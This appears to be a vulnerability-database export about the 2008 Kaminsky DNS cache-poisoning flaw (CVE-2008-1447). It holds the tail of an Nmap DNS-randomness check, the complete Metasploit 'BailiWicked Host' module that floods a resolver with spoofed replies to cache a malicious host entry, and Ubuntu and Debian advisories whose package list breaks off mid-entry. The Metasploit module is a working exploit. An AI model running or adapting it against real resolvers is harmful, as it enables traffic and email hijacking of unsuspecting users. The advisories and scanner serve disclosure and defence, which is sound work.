0x00, 0x00, -- Additional RRs\n 0x08) .. \"txidtest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. \"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xba\n or string.byte(result, 2) ~= 0xbe) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "metasploit": [{"lastseen": "2020-10-06T04:17:56", "description": "This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "DNS BailiWicked Host Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "1976-01-01T00:00:00", "id": "MSF:AUXILIARY/SPOOF/DNS/BAILIWICKED_HOST", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'net/dns'\nrequire 'resolv'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DNS BailiWicked Host Attack',\n 'Description' => %q{\n This exploit attacks a fairly ubiquitous flaw in DNS implementations which\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single\n malicious host entry into the target nameserver by sending random hostname\n queries to the target DNS server coupled with spoofed replies to those\n queries from the authoritative nameservers for that domain. Eventually, a\n guessed ID will match, the spoofed packet will get accepted, and due to the\n additional hostname entry being within bailiwick constraints of the original\n request the malicious host entry will get cached.\n },\n 'Author' => [ 'I)ruid', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-1447' ],\n [ 'OSVDB', '46776'],\n [ 'US-CERT-VU', '800113' ],\n [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],\n ],\n 'DisclosureDate' => 'Jul 21 2008'\n ))\n\n register_options(\n [\n OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),\n OptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]),\n OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),\n OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),\n OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),\n OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),\n OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]),\n\n ])\n\n deregister_options('FILTER','PCAPFILE')\n\n end\n\n def auxiliary_commands\n return {\n \"racer\" => \"Determine the size of the window for the target server\"\n }\n end\n\n def cmd_racer(*args)\n targ = args[0] || rhost()\n dom = args[1] || \"example.com\"\n\n if !(targ and targ.length > 0)\n print_status(\"usage: racer [dns-server] [domain]\")\n return\n end\n\n calculate_race(targ, dom)\n end\n\n def check\n targ = rhost\n\n srv_sock = Rex::Socket.create_udp(\n 'PeerHost' => targ,\n 'PeerPort' => 53\n )\n\n random = false\n ports = {}\n lport = nil\n reps = 0\n\n 1.upto(30) do |i|\n\n req = Resolv::DNS::Message.new\n txt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n req.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n req.rd = 1\n\n srv_sock.put(req.encode)\n res, addr = srv_sock.recvfrom(65535, 1.0)\n\n\n if res and res.length > 0\n reps += 1\n res = Resolv::DNS::Message.decode(res)\n res.each_answer do |name, ttl, data|\n if (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n t_addr, t_port = $1.split(':')\n\n vprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\")\n t_port = t_port.to_i\n if(lport and lport != t_port)\n random = true\n end\n lport = t_port\n ports[t_port] ||=0\n ports[t_port] +=1\n end\n end\n end\n\n\n if(i>5 and ports.keys.length == 0)\n break\n end\n end\n\n srv_sock.close\n\n if(ports.keys.length == 0)\n vprint_error(\"ERROR: This server is not replying to recursive requests\")\n return Exploit::CheckCode::Unknown\n end\n\n if(reps < 30)\n vprint_warning(\"WARNING: This server did not reply to all of our requests\")\n end\n\n if(random)\n ports_u = ports.keys.length\n ports_r = ((ports.keys.length/30.0)*100).to_i\n print_status(\"PASS: This server does not use a static source port. Randomness: #{ports_u}/30 %#{ports_r}\")\n if(ports_r != 100)\n vprint_status(\"INFO: This server's source ports are not really random and may still be exploitable, but not by this tool.\")\n # Not exploitable by this tool, so we lower this to Appears on purpose to lower the user's confidence\n return Exploit::CheckCode::Appears\n end\n else\n vprint_error(\"FAIL: This server uses a static source port and is vulnerable to poisoning\")\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run\n check_pcaprub_loaded # Check first.\n\n target = rhost()\n source = Rex::Socket.source_address(target)\n saddr = datastore['SRCADDR']\n sport = datastore['SRCPORT']\n hostname = datastore['HOSTNAME'] + '.'\n address = datastore['NEWADDR']\n recons = datastore['RECONS']\n xids = datastore['XIDS'].to_i\n newttl = datastore['TTL'].to_i\n xidbase = rand(20001) + 20000\n numxids = xids\n\n domain = hostname.sub(/\\w+\\x2e/,\"\")\n\n srv_sock = Rex::Socket.create_udp(\n 'PeerHost' => target,\n 'PeerPort' => 53\n )\n\n # Get the source port via the metasploit service if it's not set\n if sport.to_i == 0\n req = Resolv::DNS::Message.new\n txt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n req.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n req.rd = 1\n\n srv_sock.put(req.encode)\n res, addr = srv_sock.recvfrom()\n\n if res and res.length > 0\n res = Resolv::DNS::Message.decode(res)\n res.each_answer do |name, ttl, data|\n if (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n t_addr, t_port = $1.split(':')\n sport = t_port.to_i\n\n print_status(\"Switching to target port #{sport} based on Metasploit service\")\n if target != t_addr\n print_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\")\n end\n end\n end\n end\n end\n\n # Verify its not already cached\n begin\n query = Resolv::DNS::Message.new\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\n query.rd = 0\n\n begin\n cached = false\n srv_sock.put(query.encode)\n answer, addr = srv_sock.recvfrom()\n\n if answer and answer.length > 0\n answer = Resolv::DNS::Message.decode(answer)\n answer.each_answer do |name, ttl, data|\n\n if((name.to_s + \".\") == hostname)\n t = Time.now + ttl\n print_error(\"Failure: This hostname is already in the target cache: #{name}\")\n print_error(\" Cache entry expires on #{t}... sleeping.\")\n cached = true\n select(nil,nil,nil,ttl)\n end\n end\n\n end\n end until not cached\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\")\n end\n\n res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\n\n print_status \"Targeting nameserver #{target} for injection of #{hostname} as #{address}\"\n\n # Look up the nameservers for the domain\n print_status \"Querying recon nameserver for #{domain}'s nameservers...\"\n answer0 = res0.send(domain, Net::DNS::NS)\n #print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\"\n\n barbs = [] # storage for nameservers\n answer0.answer.each do |rr0|\n print_status \" Got an #{rr0.type} record: #{rr0.inspect}\"\n if rr0.type == 'NS'\n print_status \" Querying recon nameserver for address of #{rr0.nsdname}...\"\n answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\n #print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\"\n answer1.answer.each do |rr1|\n print_status \" Got an #{rr1.type} record: #{rr1.inspect}\"\n res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1)\n print_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\"\n answer2 = res2.send(domain, Net::DNS::SOA)\n if answer2 and answer2.header.auth? and answer2.header.anCount >= 1\n nsrec = {:name => rr0.nsdname, :addr => rr1.address}\n barbs << nsrec\n print_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\"\n end\n end\n end\n end\n\n if barbs.length == 0\n print_status( \"No DNS servers found.\")\n srv_sock.close\n close_pcap\n return\n end\n\n\n if(xids == 0)\n print_status(\"Calculating the number of spoofed replies to send per query...\")\n qcnt = calculate_race(target, domain, 100)\n numxids = ((qcnt * 1.5) / barbs.length).to_i\n if(numxids == 0)\n print_status(\"The server did not reply, giving up.\")\n srv_sock.close\n close_pcap\n return\n end\n print_status(\"Sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query\")\n end\n\n # Flood the target with queries and spoofed responses, one will eventually hit\n queries = 0\n responses = 0\n\n\n open_pcap unless self.capture\n\n print_status( \"Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...\")\n\n while true\n randhost = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain # randomize the hostname\n\n # Send spoofed query\n req = Resolv::DNS::Message.new\n req.id = rand(2**16)\n req.add_question(randhost, Resolv::DNS::Resource::IN::A)\n\n req.rd = 1\n\n src_ip = source\n\n if(saddr == 'Random')\n src_ip = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\")\n end\n\n p = PacketFu::UDPPacket.new\n p.ip_saddr = src_ip\n p.ip_daddr = target\n p.ip_ttl = 255\n p.udp_sport = (rand((2**16)-1024)+1024).to_i\n p.udp_dport = 53\n p.payload = req.encode\n p.recalc\n\n capture_sendto(p, target)\n\n queries += 1\n\n # Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\n req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))\n req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))\n req.add_additional(hostname, newttl, Resolv::DNS::Resource::IN::A.new(address))\n req.qr = 1\n req.ra = 1\n\n # Reuse our PacketFu object\n p.udp_sport = 53\n p.udp_dport = sport.to_i\n\n xidbase.upto(xidbase+numxids-1) do |id|\n req.id = id\n p.payload = req.encode\n barbs.each do |barb|\n p.ip_saddr = barb[:addr].to_s\n p.recalc\n capture_sendto(p, target)\n responses += 1\n end\n end\n\n # status update\n if queries % 1000 == 0\n print_status(\"Sent #{queries} queries and #{responses} spoofed responses...\")\n if(xids == 0)\n print_status(\"Recalculating the number of spoofed replies to send per query...\")\n qcnt = calculate_race(target, domain, 25)\n numxids = ((qcnt * 1.5) / barbs.length).to_i\n if(numxids == 0)\n print_status(\"The server has stopped replying, giving up.\")\n srv_sock.close\n close_pcap\n return\n end\n print_status(\"Now sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query\")\n end\n end\n\n # every so often, check and see if the target is poisoned...\n if queries % 250 == 0\n begin\n query = Resolv::DNS::Message.new\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\n query.rd = 0\n\n srv_sock.put(query.encode)\n answer, addr = srv_sock.recvfrom()\n\n if answer and answer.length > 0\n answer = Resolv::DNS::Message.decode(answer)\n answer.each_answer do |name, ttl, data|\n if((name.to_s + \".\") == hostname)\n print_good(\"Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}\")\n print_status(\"TTL: #{ttl} DATA: #{data}\")\n close_pcap\n return\n end\n end\n end\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\")\n end\n end\n end\n end\n\n #\n # Send a recursive query to the target server, then flood\n # the server with non-recursive queries for the same entry.\n # Calculate how many non-recursive queries we receive back\n # until the real server responds. This should give us a\n # ballpark figure for ns->ns latency. We can repeat this\n # a few times to account for each nameserver the cache server\n # may query for the target domain.\n #\n def calculate_race(server, domain, num=50)\n\n q_beg_t = nil\n q_end_t = nil\n cnt = 0\n\n times = []\n\n hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain\n\n sock = Rex::Socket.create_udp(\n 'PeerHost' => server,\n 'PeerPort' => 53\n )\n\n\n req = Resolv::DNS::Message.new\n req.add_question(hostname, Resolv::DNS::Resource::IN::A)\n req.rd = 1\n req.id = 1\n\n q_beg_t = Time.now.to_f\n sock.put(req.encode)\n req.rd = 0\n\n while(times.length < num)\n res, addr = sock.recvfrom(65535, 0.01)\n\n if res and res.length > 0\n res = Resolv::DNS::Message.decode(res)\n\n if(res.id == 1)\n times << [Time.now.to_f - q_beg_t, cnt]\n cnt = 0\n\n hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain\n\n sock.close\n sock = Rex::Socket.create_udp(\n 'PeerHost' => server,\n 'PeerPort' => 53\n )\n\n q_beg_t = Time.now.to_f\n req = Resolv::DNS::Message.new\n req.add_question(hostname, Resolv::DNS::Resource::IN::A)\n req.rd = 1\n req.id = 1\n\n sock.put(req.encode)\n req.rd = 0\n end\n\n cnt += 1\n end\n\n req.id += 1\n\n sock.put(req.encode)\n end\n\n min_time = (times.map{|i| i[0]}.min * 100).to_i / 100.0\n max_time = (times.map{|i| i[0]}.max * 100).to_i / 100.0\n sum = 0\n times.each{|i| sum += i[0]}\n avg_time = (\t(sum / times.length) * 100).to_i / 100.0\n\n min_count = times.map{|i| i[1]}.min\n max_count = times.map{|i| i[1]}.max\n sum = 0\n times.each{|i| sum += i[1]}\n avg_count = sum / times.length\n\n sock.close\n\n print_status(\" race calc: #{times.length} queries | min/max/avg time: #{min_time}/#{max_time}/#{avg_time} | min/max/avg replies: #{min_count}/#{max_count}/#{avg_count}\")\n\n\n # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)\n avg_count\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/spoof/dns/bailiwicked_host.rb"}], "ubuntu": [{"lastseen": "2020-07-08T23:41:00", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented \nby Dnsmasq. A remote attacker could exploit this to spoof DNS entries \nand poison DNS caches. Among other things, this could lead to \nmisdirected email and web traffic.", "edition": 5, "modified": "2008-07-22T00:00:00", "published": "2008-07-22T00:00:00", "id": "USN-627-1", "href": "https://ubuntu.com/security/notices/USN-627-1", "title": "Dnsmasq vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2020-11-11T13:19:47", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1603-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind9\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's BIND 9 packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nNote that this security update changes BIND network behavior in a\nfundamental way, and the following steps are recommended to ensure a\nsmooth upgrade.\n\n\n1. Make sure that your network configuration is compatible with source\nport randomization. If you guard your resolver with a stateless packet\nfilter, you may need to make sure that no non-DNS services listen on on\nthe 1024--65535 UDP port range and open it at the packet filter. For\ninstance, packet filters based on etch's Linux 2.6.18 kernel only\nsupport stateless filtering of IPv6 packets, and are therefore pose this\nadditional difficulty. (If you use IPv4 with iptables and ESTABLISHED\nrules, networking changes are likely not required.)\n\n2. Install the BIND 9 upgrade, using "apt-get update" followed by\n"apt-get install bind9". Verify that the named process has been\nrestarted and answers recursive queries. (If all queries result in\ntimeouts, this indicates that networking changes are necessary; see the\nfirst step.)\n\n3. Verify that source port randomization is active. Check that the\n/var/log/daemon.log file does not contain messages of the following\nform\n\n named[6106]: /etc/bind/named.conf.options:28: using specific\n query-source port suppresses port randomization and can be insecure.\n\nright after the "listening on IPv6 interface" and "listening on IPv4\ninterface" messages logged by BIND upon startup. If these messages are\npresent, you should remove the indicated lines from the configuration,\nor replace the port numbers contained within them with "*" sign (e.g.,\nreplace "port 53" with "port *").\n\nFor additional certainty, use tcpdump or some other network monitoring\ntool to check for varying UDP source ports. If there is a NAT device\nin front of your resolver, make sure that it does not defeat the\neffect of source port randomization.\n\n4. If you cannot activate source port randomization, consider\nconfiguring BIND 9 to forward queries to a resolver which can, possibly\nover a VPN such as OpenVPN to create the necessary trusted network link.\n(Use BIND's forward-only mode in this case.)\n\n\nOther caching resolvers distributed by Debian (PowerDNS, MaraDNS,\nUnbound) already employ source port randomization, and no updated\npackages are needed. BIND 9.5 up to and including version\n1:9.5.0.dfsg-4 only implements a weak form of source port\nrandomization and needs to be updated as well. For information on\nBIND 8, see DSA-1604-1, and for the status of the libc stub resolver,\nsee DSA-1605-1.\n\nThe updated bind9 packages contain changes originally scheduled for\nthe next stable point release, including the changed IP address of\nL.ROOT-SERVERS.NET (Debian bug #449148).\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 9.3.4-2etch3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your bind9 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.dsc\n Size/MD5 checksum: 897 aeb15f8babb1e6e38367b9f19fea87da\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4.orig.tar.gz\n Size/MD5 checksum: 4043577 198181d47c58a0a9c0265862cd5557b0\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.diff.gz\n Size/MD5 checksum: 302126 521abea46b1104f2251cc398f30af303\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.3.4-2etch3_all.deb\n Size/MD5 checksum: 189560 46ff778db82d2e171d292ecac93ea9b6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 98154 bbdbcd3d0840f5ffcf4eaddf5a8c253f\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 1407380 ca8995875e76a25de6f32a47f62ea876\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 226088 93100774ae6da891caf9fa27a2134cdf\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 112616 bca5dcca8abff15f4f9cc911f9f94818\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 322286 677fdcf8e9a8c272a08ed47a79e09209\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 190084 87d64554a1cdde9f58cc850f7d5961a1\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 96508 48ba9fc0e884f093e95988bd4e088b9c\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 564862 7b23948d7c741d4f287698d28385ce71\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 188742 5dd8024a9864137f4529785fcc9c9231\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 116534 2e7dc9ea95bae40dc396ff504abb03bb\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 115784 b961fd6c797a2d1422ae588bfc25ed9d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 224294 4d33744bb92300b061cad41dd8de7ea5\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 1111932 e43ced7eae496d7835247a068bef4a66\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 190742 9e39ced5d3464594b9dda6ce683fc653\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 319008 e36a35983ebc5061e8669ef7f004a851\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 552414 c93c2863bddd5661010ae3472e210aa8\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 95922 f114eb76add0d7dabad1d082d38ccf08\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 117072 a70d1d96ea01aa24fb9642e09133824f\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 187646 70372cec3522356dcd00901ea64714d4\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 111270 6dc6edfcca9fecb28c7e66d31ab14a74\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 114722 905d0f9b7b5ebc0308c54158e71d03cc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 96704 09d3c850f12a6c1f6eab4e800a118c87\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 107888 b2ea4933e233a1af8dd1e5ee641999a2\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 112714 27b1fde9b144cacb1ae06a441d7c5787\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 116076 cafc3294083de02518ab5fe0f0488c3b\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 532206 a005bdff779fed950e4750231d0184b2\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 187364 72fdca60a20876be71b678028cefc316\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 95752 bce98b259a2821d59f6e6b441b491d77\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 182950 26a15d51a4e6f1ea1dda99ab4d3ea34c\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 217686 97f538e27ab7c765b514a9ce59869a41\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 95168 374d7f18915fc8eb6b775d272cf28f2e\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 1074498 fdada51888027e9c3e89961b31a48ded\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 311078 43d1c044b0cc81b072b8962ad3b8f019\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 96986 bba6d0a611b7088e284564b430f91405\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 97140 14f3dacd102208700660873637dea18b\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 185570 012eb78b091c0991988a95160df7d65d\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 115822 d717418b7ec770e5419e0941670eab19\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 543342 201331119c074430d503b68dc210e187\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 1258146 2f092d0708338d0a3ac8924218fee0d7\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 315070 bc8d94bec7b1c8cf80f64fb72d1f38e5\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 187942 1cd85afac13850d1807a5b50b9d3262f\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 114612 912dc2007ca7cb6097a3e6a4e98897e3\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 217378 49276452262a155ba17db2ad8c66e3e2\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 113466 428d268ce8ad5386c1af758ca4cff2ce\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 106034 ce4d4a024472317185d4c6492b7d30df\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 180292 1fd02a86a31b68a8db2407904495a0db\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 94838 9dbc2734dd8b8bb7c3e7684faabea64e\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 206330 a22fb6cb47d6e449007d665b9e6d8c52\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 113162 b9bc5fa7f96313235a53ab6fd819b58b\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_i386.deb\n Size/MD5 